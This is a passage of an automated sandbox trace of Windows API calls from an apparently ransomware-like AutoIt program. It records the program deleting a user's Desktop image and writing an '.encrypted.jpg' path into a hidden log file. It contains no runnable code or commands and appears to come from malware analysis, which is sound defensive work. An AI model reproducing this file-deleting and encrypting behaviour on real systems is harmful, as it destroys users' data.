[0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.255] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.255] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.256] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\jjp_bfl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0031.256] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.256] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.256] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.256] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0031.256] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.256] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.257] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0031.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.257] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0031.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88ca48 [0031.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88ca48, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0031.257] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.257] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0031.257] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0031.257] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0031.258] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0031.258] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.258] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.258] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a78 [0031.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.258] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.258] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.259] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.259] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0031.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.259] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg", lpFilePart=0x0) returned 0x49 [0031.259] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34de5420, ftCreationTime.dwHighDateTime=0x1d5c30b, ftLastAccessTime.dwLowDateTime=0xa6fb2b30, ftLastAccessTime.dwHighDateTime=0x1d5ba0c, ftLastWriteTime.dwLowDateTime=0x12848220, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1710f, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="jJp_bFL.jpg", cAlternateFileName="")) returned 0x7c2100 [0031.259] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\jjp_bfl.jpg")) returned 1 [0031.261] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34de5420, ftCreationTime.dwHighDateTime=0x1d5c30b, ftLastAccessTime.dwLowDateTime=0xa6fb2b30, ftLastAccessTime.dwHighDateTime=0x1d5ba0c, ftLastWriteTime.dwLowDateTime=0x12848220, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1710f, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="jJp_bFL.jpg", cAlternateFileName="")) returned 0 [0031.261] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.261] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.262] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.263] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.263] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.263] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.263] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.263] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.263] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.263] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.264] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.264] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.264] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.264] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.264] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0031.264] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.264] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.264] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x747, lpOverlapped=0x0) returned 1 [0031.265] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.265] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x747, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.265] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0031.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.encrypted.jpg\r\n", cchWideChar=86, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 86 [0031.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56) returned 0x794b90 [0031.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.encrypted.jpg\r\n", cchWideChar=86, lpMultiByteStr=0x794b90, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.encrypted.jpg\r\n", lpUsedDefaultChar=0x0) returned 86 [0031.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.265] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0031.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0031.265] WriteFile (in: hFile=0x140, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x55, lpOverlapped=0x0) returned 1 [0031.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0031.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.265] CloseHandle (hObject=0x140) returned 1 [0031.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0031.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.267] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0031.267] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: 